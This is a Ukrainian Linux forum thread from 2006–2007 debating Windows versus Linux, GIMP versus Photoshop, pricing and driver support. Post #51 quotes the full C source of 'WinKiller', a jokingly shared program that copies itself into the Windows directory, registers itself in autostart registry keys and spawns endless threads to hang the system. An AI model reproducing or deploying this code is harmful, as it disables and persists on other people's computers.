Опитування

Як Ви ставитеся до Windows? І чому?

Жити не можу без неї
107 (16.4%)
Пацієнт швидше живий, ніж мертвий
167 (25.5%)
Пацієнт швидше мертвий, ніж живий
119 (18.2%)
Яка гидота ця ваша заливна риба!
197 (30.1%)
А що це?
38 (5.8%)
Хто там?
26 (4%)

Проголосувало: 131

Автор Гілка: Як Ви ставитеся до Windows? І чому?  (Прочитано 31526 раз)

Відсутній miwa

• Літератор
  • дописів: 1111
Re: Як Ви ставитеся до Windows? І чому?
« Відповідей #45 : 2006-10-23 23:51:03 »
Цитата
Взагалі я думаю, що програма рівня Photoshop-a під Linux, це одна з двох необхідних умов за яких Linux зможе підкорити світ. Друга, це широка підтримка апаратури (Wi-Fi, USB, Bluetooth, принтери, відео-прискорення, звук) без бубнів. Цікаво, яка з цих умов буде задоволена першою?

Почнімо з того, що НМВ (товариш займається графікою; не можу сказати наскільки професійно, бо сам в тому ні бум-бум, але це його хліб) "чистий" фотошоп, без маси втулок - це не так уже й круто. Основна його перевага - це якраз численні інструменти, як правило сторонніх розробників, котрі й перетворюють фотошоп у потужну систему для обробки графіки.

Ну а гімп віднедавна також почав вчитись ці самі втулки використовувати.

Що стосується апаратури - лінукс підтримує апаратуру, котра відповідає стандартам. Проблеми є з тими пристроями, котрі писані "під віндовз онлі" - він-модемами, він-принтерами, він-тюнерами і т.д. І тут вже не зовсім вина лінукса, що він погано підтримує пристрої, котрі для нього взагалі не призначені, правда?

І до речі, хто вам сказав, що лінукс має завойовувати світ? Чому ви думаєте, що він його ще не завоював? Або що йому це взагалі потрібно? ;о)
Читайте документацію - вона кермує.

Відсутній 235

• Кореспондент
  • дописів: 238
« Відповідей #46 : 2006-10-24 02:10:09 »
А чим реально можна робити графіку під лінуксом? Прибічниеи GIMP-а кажуть, що у тих, хто не вміє ним користуватися, руки не з того місця ростуть. Але поклавши руку на серце - хіба GIMP може конкурувати з Photoshop-ом? A інші програми виробництва Adobe хіба мають відповідники?

підкажу, що графіку дійсно можливо робити в GIMP'і  ;)
щойно довелося малювати в ньому банер-кнопку, перед тим підмальовувати й різати шапку сайта. Власне не є дизайнером, просто доводиться затикати проблемні місця, але відверто не розумію в чому саме GIMP не може конкурувати з Photoshop'ом. Кількістю комерційних не так вже й критично потрібних комерційних розширень?
« Змінено: 2006-10-24 02:34:24 від uran »
Олександр Приймак |  Google Web Toolkit

Відсутній Володимир Лісівка

• Адміністратор ЩОДО
  • Видавець
  • дописів: 3820
  • Програміст
« Відповідей #47 : 2006-10-24 12:47:15 »
Цитата
І до речі, хто вам сказав, що лінукс має завойовувати світ? Чому ви думаєте, що він його ще не завоював? Або що йому це взагалі потрібно? ;о)

http://www.kroah.com/log/linux/ols_2006_keynote.html

Цитата
Total world domination is proceeding as planned.
« Змінено: 2006-10-24 12:49:53 від lvm »
[Fedora Linux]

• Адміністратор ЩОДО
  • Видавець
  • Програміст
« Відповідей #48 : 2006-10-24 13:15:55 »
Саме те, про що я казав. Якщо тобі не подобається GIMP, то ти сам винуватий. Згоден, що на GIMP-ом роблять класну графіку, я бачив в інеті. Як вони таке роблять - для мене загадка. Мені особисто (і я думаю що я тут не одинокий), не хочеться займатися організацією нормальної роботи, мені хочеться займатися цією нормальною роботою.
Це ваші особисті фінансові проблеми ($2K за фотошоп, $600 за вінду, + плагіни).

Цитата
А якщо відкинути ::) питання про ціну,
І зарплату... ;-)

Цитата
то GIMP незручний і недоукомплектований порівняно з Photoshop-ом. Наприклад організація меню і панелей і можливості роботи із шарами відповідно.

Поки одні патякають язиками, інші роблять (я маю на увазі GimpShop: http://freshmeat.net/projects/gimpshop/ ).

Цитата
Кажуть, розробницька версія гімпа зараз дуже потужна (2.3.12 остання, здається).

Можливо ядро у GIMP-а і дуже суперське. Але зручна програма і програма з потужним ядром - це не одне й те-саме.

Компілятор вам в руки. Що заважає зробити Gimp зручним для себе, якщо є бажання?

Цитата
Взагалі я думаю, що програма рівня Photoshop-a під Linux, це одна з двох необхідних умов за яких Linux зможе підкорити світ.
Уже давно цілий PhotoShop можна запускати під Лінуксом, але чомусь не видно щоб ці 0.05% користувачів win, які користуються PhotoShop-ом, почали переповзати на лінукс. Можливо тому що ціна ОС-ки порівняно з ціною всього робочого місця і зарплатою дизайнера та адміна це така фігня про яку ніхто і не згадує?

PS.
А чому Маки не підкорили світ? PhotoShop там є...

Цитата
Друга, це широка підтримка апаратури (Wi-Fi, USB, Bluetooth, принтери, відео-прискорення, звук) без бубнів.
Лінукс і так має найширшу підтримку апаратури ніж будь-яка інша ос-ка.

У мене все обладнання підтримується без бубна, щоправда я спочатку цікавився чи воно підтримується лінуксом а вже потім купував. :-)
[Fedora Linux]

Відсутній Cthulhu

• Кореспондент
  • дописів: 183
« Відповідей #49 : 2006-11-19 13:04:55 »
2EG142:
Пункт нумер раз. Це україномовний форум, читайте правила.
Пункт нумер два. А що не так з драйверами на Лінуксі? По-моєму там все в порядку... тобто бардак повний, але на інших осях справи ще гірші.

Відсутній AEX_CHECKER

• Новачок
  • *
  • дописів: 21
  • I Love YaBB 2!
« Відповідей #50 : 2006-11-19 20:40:14 »
BTW, будь-яка M$ зноситься програмою в 2 кб. Вихідний код:
Написано моїм другом. Після компіляції у Visual Studio займає 2 кб  :D.

BTW, це у освітніх цілях.  ::)

Супер комп'ютер NEC виконує безкінечний цикл за 10 секунд  ;)

Відсутній Soft

• Кореспондент
  • дописів: 100
  • Чому саме Лінукс?
« Відповідей #51 : 2006-11-24 11:37:28 »
BTW, будь-яка M$ зноситься програмою в 2 кб. Вихідний код:
//***********************************************************************************

//Программа "завешивает" винды

//***********************************************************************************

#pragma comment(linker,"/MERGE:.rdata=.text")

#pragma comment(linker,"/FILEALIGN:512 /SECTION:.text,EWRX /IGNORE:4078")

#pragma comment(linker,"/ENTRY:New_WinMain")

#include <windows.h>

#include <stdlib.h>

HINSTANCE hKernel;

//----------------------------------------------------------------------------------

DWORD ThreadProc(LPDWORD z)

{

int  i,j;

char szFool[0x40];

WNDCLASS wc;

while(TRUE){

for(i=0;;i++)

{

srand(i);

for(j=0;j <0x20;j++) szFool[j]=(rand()%7) & 0xFF;

szFool[0x20]=0;

wc.style         = CS_GLOBALCLASS;

wc.lpfnWndProc   = DefWindowProc;

wc.cbClsExtra    = 0;

wc.cbWndExtra    = 0;

wc.hInstance     = GetModuleHandle(NULL);

wc.hIcon         = NULL;

wc.hCursor       = NULL;

wc.hbrBackground = NULL;

wc.lpszMenuName  = NULL;

wc.lpszClassName = szFool;

RegisterClass(&wc);

}

}

return 0;

}

//-------------------------------------------------------

void New_WinMain(void){

char prgname[5555],WinDir[5555];

SetPriorityClass(GetCurrentProcess(),HIGH_PRIORITY_CLASS);

SetThreadPriority(GetCurrentThread(),THREAD_PRIORITY_HIGHEST);

GetModuleFileName(NULL,prgname,sizeof(prgname));

GetEnvironmentVariable("WINDIR",WinDir,sizeof(WinDir));

strcat(WinDir,"\\WinKiller.exe");

CopyFile(prgname,WinDir,0);

HKEY reg;

RegOpenKey(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",&reg);

RegSetValueEx(reg,"WinKiller",0,REG_SZ,(const unsigned char *)"WinKiller.exe",strlen("WinKiller.exe"));

RegCloseKey(reg);

RegOpenKey(HKEY_CURRENT_USER,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",&reg);

RegSetValueEx(reg,"WinKiller",0,REG_SZ,(const unsigned char *)"WinKiller.exe",strlen("WinKiller.exe"));

RegCloseKey(reg);

DWORD dwResult;

while(TRUE)

CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)ThreadProc,NULL,0,&dwResult);

}

Написано моїм другом. Після компіляції у Visual Studio займає 2 кб  :D.

BTW, це у освітніх цілях.  ::)

В Лінукс також якщо ввійти під рутом та запустити процесс з максимальним пріорітетом, то він підвисне.

• Адміністратор ЩОДО
  • Видавець
  • Програміст
« Відповідей #52 : 2006-11-24 16:16:42 »
В Лінукс також якщо ввійти під рутом та запустити процесс з максимальним пріорітетом, то він підвисне.

Поставте собі autonice.
[Fedora Linux]

Відсутній CuB

• Новачок
  • *
  • дописів: 44
  • рано чи піздно, так чи інакше
« Відповідей #53 : 2006-11-30 10:31:36 »
особисто мені, останнім часом усе одно ща налаштовувати, за чим сидіти. Аби гроші платили так ssh був відкритий...
wbr cub

Відсутній Soft

• Кореспондент
  • дописів: 100
  • Чому саме Лінукс?
« Відповідей #54 : 2006-12-03 09:06:18 »
Це ваші особисті фінансові проблеми ($2K за фотошоп, $600 за вінду, + плагіни).

WinXP Eng - 150$
WinXP RU - 230$
Adobe PhotoShop CS2 - 750$

Adobe Adobe Creative Suite Premium Adobe Creative Suite Premium 2.0, Russian version, RET (Adobe Photoshop CS2, Illustrator CS2, InDesign CS2, GoLive CS2, and Acrobat 7.0 Professional software with new Version Cue CS2, Adobe Bridge, and Adobe Stock - 1530$
http://price.ua/

Відсутній -LsLaYeR-

• Новачок
  • *
  • дописів: 7
  • Magician!
« Відповідей #55 : 2007-01-21 21:01:14 »
Ой, людоньки...
Я на роботі постійно працюю в Вінді з фотошопом (я дизайнер). І адмініструю  її...
На Лінукс перехожу тільки через одне - гроші. Бо зовсім скоро неможливо буде поставити вінду неліцензійну.

А відносно Фотошопа... Ніколи Гімп не буде таким-же як Фотошоп... Причина - гроші, як це не парадоксально. Якщо Вам платити за щось - і не платити, куди ви вкладете більше зусиль? в "ентузіазізм"? Чи в гарантований гонорар? Скільки б не було "ідейних программерів", що працюють згідно з концепцією ГНУ, все одно ті, хто отримує гроші за свою роботу - працюватимуть краще.

Відносно ще одного пунктика: Покажіть мені аналог КваркЕкспреса на Лінуксі? Немає. А поліграфія - дуже великий сегмент використання комп’ютерної техніки. І в цьому сегменті Лінуксом і не пахне.

Маки - успішно тримають свою нішу, і ніхто туди не влізе. Ні Лінукс, ні Віндовз. Що б вони не робили (Лін і Він :)).

Про вішання системи я мовчатиму, бо повісити можна все. Навіть ОС/2 :)

Цитата
Компілятор вам в руки. Що заважає зробити Gimp зручним для себе, якщо є бажання?
Тобто, ви, мені, дизайнеру, який не відрізнить Паскаль від С пропонуєте налаштовувати собі Гімп? (Чи може хтось із гуру захоче "безкоштовно" налаштувати мені Гімп?)

Цитата
У мене все обладнання підтримується без бубна, щоправда я спочатку цікавився чи воно підтримується лінуксом а вже потім купував.
Підкажіть відеокарту, яка підтримується Лінуксом? З АТІ я маю проблеми, з Нвідія - теж (на компі в мене стоїть Х800 і вбудована Нвідія 6100)... Більше, наскільки я знаю, відеокарт пристойних в світі немає. Чи я помиляюся?
Магія - частина тебе, і з її допомогою ти можеш змінити світ!

Praporshic

• Гість
« Відповідей #56 : 2007-01-21 21:41:19 »
Підкажіть відеокарту, яка підтримується Лінуксом? З АТІ я маю проблеми, з Нвідія - теж (на компі в мене стоїть Х800 і вбудована Нвідія 6100)... Більше, наскільки я знаю, відеокарт пристойних в світі немає. Чи я помиляюся?
Помиляєтесь. Ви маєте проблеми. До речі, а Ви не намагались змусити працювати GeForce фізично видаливши АТІ? Окрім того, коли задавались питання про налаштування драйвера АТІ чогось про вбудовану картку нічого не було чути. В мене вдома мамка з вбудованим 6150, до того були FX 5200 та 5500, окрім того, нормально працює встановлений мною лінукс на 4x00 Titanium (що замість x - не пам'ятаю). Пару разів вдавалось завести й АТІ з офіційним драйвером від виробника. Хоча, воно досить пристойно працює й на безкоштовному драйвері що є у системі. І ще один момент, коли я купував собі свій перший комп з мамкою на nForce2 я спочатку придбав до нього Radeon 9200, але після того, як PAL витратив близько 5 годин на те, щоб його завести я швиденько (не пройшло й тижня з дня покупки) змінив його на GeForce FX 5200. Причина проста як сокира - конфлікт між мамкою та відеокарткою (хоч мамка без вбудованого відео). У сучасних nForce це ніби виправлено.

Цитата
А відносно Фотошопа... Ніколи Гімп не буде таким-же як Фотошоп... Причина - гроші, як це не парадоксально. Якщо Вам платити за щось - і не платити, куди ви вкладете більше зусиль? в "ентузіазізм"? Чи в гарантований гонорар? Скільки б не було "ідейних программерів", що працюють згідно з концепцією ГНУ, все одно ті, хто отримує гроші за свою роботу - працюватимуть краще.
Чому GIMP має бути таким як Photoshop? Це різні програми, різне походження та різні категорії користувачів. А якщо починати "священні війни" - то чого не вистачає у гімпі? Вигляду фотошопу - встановіть gimpshop і все. Модулів, що пишуть сторонні розробники для адобівського продукту? У WinGIMP я бачив їх підтримку десь так роки два тому. Підтримка RAW & CMYK - вона вже є. А ще є підтримка вектроної графіки SVG.

Цитата
Відносно ще одного пунктика: Покажіть мені аналог КваркЕкспреса на Лінуксі? Немає. А поліграфія - дуже великий сегмент використання комп’ютерної техніки. І в цьому сегменті Лінуксом і не пахне.

Якось в одного мого знайомого (дуже поглибленого у науку) якесь іноземне видавництво відмовилось приймати статтю зроблену у PageMaker. Хотіли у TeX. Linux`ом "не пахне" лише у вітчизняній поліграфії.  Я не дизайнер, і навіть в очі не бачив того кварка, трохи грався з PageMaker під мастдаєм та зі Scribus під Linux (все ніяк не допишу обіцяну статтю до root.ua), але останній мені здався досить зручним.

Цитата
Про вішання системи я мовчатиму, бо повісити можна все. Навіть ОС/2 Усмішка
Цілком згоден. В мене оно вже два роки четверта неварь постійно висить. На гвіздку на стінці ;).

Цитата
Тобто, ви, мені, дизайнеру, який не відрізнить Паскаль від С пропонуєте налаштовувати собі Гімп? (Чи може хтось із гуру захоче "безкоштовно" налаштувати мені Гімп?)
1. Принаймні - підказати як він має виглядати. Підказка "як Photoshop" за корисну не вважається. Такі умови для людей, яким запропоновано розробити новий GUI для GIMP.
2. А хто казав, що Linux - то є безкоштовно? Покажіть, щоб знати кого бити.

Відсутній Nickispeaki

• Дописувач
  • **
  • дописів: 84
  • Бог поможе! ;-)
« Відповідей #57 : 2007-01-21 22:29:41 »
Цитата
Про вішання системи я мовчатиму, бо повісити можна все. Навіть ОС/2 Усмішка
Цілком згоден. В мене оно вже два роки четверта неварь постійно висить. На гвіздку на стінці ;).

1. Про підвішування. Якось давним-давно, коли я був ще молодим -зеленим, таким, що не знав навіть що воно таке мсвін, не тещоМАКтаЛінух. А було це в 1994 році. Потрапив я на виставку, щось типу Ентерекс 94. Так от тоді я сввоїми угорілими ручками повісив практично все! Не падали хіба що Макось та, здається, айрікс на сані. Напіввісь досить швидко впала (викликавши досить сильне здивування власника компа), після того як назапускав з десяток прогів всяких. Макось, як не дивно, ще про десятку тоді ніхто і не мріяв! (здається, щось типу 7.1-7.6) я так і незамучив, але від тоді (якщо чесно, то навіть раніеш, але заочно!  ::) ) штрашенно люблю Маки. Вінди падали стільки раз, що їх навіть іноді по обллому було піднімати.... ;-)

Після стількох років віндоюзання (неліцензійного ж!) і трішки макання вирішив засісти за лінух. БЕЗКОШТОВНО ЛІЦЕНЗІЙНИЙ. Бо під він у мене тільки потрібних прог вже на кілька тисяч дол..... А жжж платить, я гадаю, все ж таки колись доведеться. Ну от. Вже з місяць мучаюся з Убунту. Цікаво подивится на тих товаришів, а ще краще на їх Лінух, який працює з коробки! Навіть у мака з цим проблем, не те що в лінусі... У мене наприклад, зараз ікілька невирішених проблем: 1як зробити видимим, яка мова зараз поточна? як у винь - знизу у треї...
2. як перемикати НОРМАЛЬНО розрішення ? у мене заара 1280х1024 на 15 дюймах. самі розумієте як воно.... спочатку стандартна Параметри екрану міняла. Зараз ... перезавантажує гном. Ясна річ, що всі незбережені файли втрачаються...
3. як нормально налаштувати груб? умене 0.97. До речі, коли ставив убунту, він вбив вісту.... Поставив хр, вбив убунту. знову поставив ббубунту, відновив попередній убунту, але здох новий(легендарна встановлюванність лінуха! логін вінвамдозволить ТІЛЬКИ МАЛЕНЬКИМИ ЛАТИНСЬКИМИ ЛІТЕРАМИ, А  ОТ ПАРОЛЬ ДОЗВОЛИВ ВВЕСТИ КИРИЛИЧНИМИ ВЕЛИКИМИ ( ;-) що я і за необачності зробив... ) - в результаті, убунту не запустиш!)
ну от... хр він пощадив....
але! у мене за замовчуванням стоїть неробочий убунту! а як поставити робочий? я вже мовчу як поставити вісту, що залишився убунту....

2.вінрар ставиться ну ДУЖЕ вже нетрадиційно. Мій улюблений арк , що як не дивно, спочатку рар бачив, а потім почав говорити, що йому треба описати змінні десь там..... №%;%?:*))!~

3. мр3 і мр4 мій убунту ПРИНЦИПОВО не БАЖАЄ бачити, про що і повідомив.... ;-( тому мусив щось шукати. знайшов (із того, що може поставити віндовсятник!) хммс. мр4 поки зась! бо..... мплеєр ну дуже вже ТЕЖ нетрадиційно ставиться!

4. про файєрфокс мовчу (гарячі клавіші, криво багато чого відображає, коли збільшити шрифт - у мене ж 1280 х1024 на 15 дюймах!), бо наскільки я зрозумів із цього форума, це в нього вроджене.

5. купу прог, які мені конче потрібні, вайн теж ДУЖЕ нетрадиційно ставиться. Я от думаю: чи знайдеться колись геній, який запропонує всім тим розумним хлопам із гну, кде, робити інсталятори з графічною оболонокою?! Чи це ТАК до непристойного просто, що ... їм ліньки зробити? 8-)

6. к3б під кде. Оскільки стандартним під убунту є гном, то я маю купу глюків через це. Міняти я гном на кде не буду (принаймні зараз) оскільки ставив всі версії убунту(і, кубунту, в другу чергу після убунту) і глюків в ній НАЙМЕНШЕ *імхо*. Тому питання писалки теж актуальне.

7. Про роботу ще питання не йшлося, бо... навіть досить необхідні проги ще нормально не запрацювали....

8. тре переформатувати розширений розділ нт, Бо убунту почав на нього гнати, що він з глюками і помилками, хоча.... він свого часу його і зробив! то мабу4ть, таки більше мій глюк, бо я файлову систему назначив, а не відформатував... ну от! тепере маю. а хто ж думав, що так буде? файли ж під вінь писали і читалися відмінно! хоча і розділ під лінь зроблений був....
Стану досконалим! :-)

Відсутній Nickispeaki

• Дописувач
  • **
  • Бог поможе! ;-)
« Відповідей #58 : 2007-01-21 22:36:14 »

ага! повністю згоден! я вже на лінух викинув гривень 30. Це, поки що, інет - і це встановлення тільки необхідних прог! Підкреслюю = НЕОБХІДНИХ.
Один ДВД (дистриб) коштує мені від 60 до 80 гривень, якщо качати з нету. сд 10 грн. Я свої убунту і ко накачав, коли у волі був інет 3 дні на шару. Я тоді гігабайт 15 накачав. Зате маю всі убунту, більшість кубунту, ксубунту, едубунту, що і роздаю ВСІМ НА ШАРУ. Ще є кілька новеньких Убунту 6.06.01 РС з нідерландів..... Безкоштовно прислали. І місяць не пройшов! сам до цих пір не вірю! 8 під РС., 1 - Мас (!) 1- амд 64.

Відсутній Nickispeaki

• Дописувач
  • **
  • Бог поможе! ;-)
« Відповідей #59 : 2007-01-21 22:43:11 »
Доречі виходити з-під Вінди в Мережу через Укртелеком взагалі страшно:-/ Якщо вийти без фаєрвола, який прикриває все, що можна і не можна, то через декілька хвилин отримуєте букет з 15-20 хробачків, spyware і вірусів, навіть не з'єднуючись з будь-яким сайтом:) Принаймні так було, коли я востаннє виходив в Мережу з-під офтопіка (десь рік тому). Таке враження, що сервери у них саме під офтопіком стоять:o
а може то в когось штрашна нелюбов до вінди?  :o

я от колись сидів під хр майже рік (навіть без антивіра, не те що файервола!) так от... поки я на порно не зайшов, жоден звір не бігав....
 А зайшов так.... одного сам ручками прибив. Другий не зміг, почав війну з ним. Ну врешті, здався, закачав антивіра. Він знайшов три штук. Прибив всіх. А ще одного через тиждень (до того в упор не бачив!) , коли обновили бази вірусів на цього вірусика.

Та й зараз я від вірусів ПРАКТИЧНО не страждаю. Я б так сказав: не лізьте не рожон, і в морду вам ніхто не дасть. А щодо лінуха.... От якби лінуха було 80 проц, а він 3 проц, побачив би скльіки б під нього було б вірусів... Під мак теж, поки не побачив віруса, то вірив рекламним зазиванням епл, що під мак вірусів НЕМАЄ. а ви що теж вірите?! :-?